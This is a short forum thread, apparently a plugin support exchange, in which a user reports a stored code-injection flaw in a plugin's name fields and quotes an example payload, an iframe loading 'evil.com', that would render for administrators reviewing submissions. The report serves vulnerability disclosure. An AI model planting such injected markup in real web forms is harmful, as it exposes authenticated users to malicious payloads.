Thread Starter
n0x00
(@n0x00)
wicked! that’s probably the quickest turn around I’ve seen to date 🙂
good work!
Thread Starter
n0x00
(@n0x00)
Oh sorry, are there any other types of post requests ?
yes I mean HTTP POST
Thread Starter
n0x00
(@n0x00)
It’s code injection, the specifics are in the post request I submitted above
I’m not sure what your having trouble with mate.
https://www.owasp.org/index.php/Code_Injection
if someone supplies html / code in the name fields, when the admin is viewing the submissions it will render the user supplied code.
badguy submits his name as ‘MrEvil <iframe src=”http://evil.com/”>’
when admin or manager of that plug in reviews the submissions it will treat the <iframe as legitimate code and render it, if evil.com has malicious payloads (java,javascript,flash metasploit whatever, it will get pushed in via iframe attacking authenticated users)
… do you need a video ?
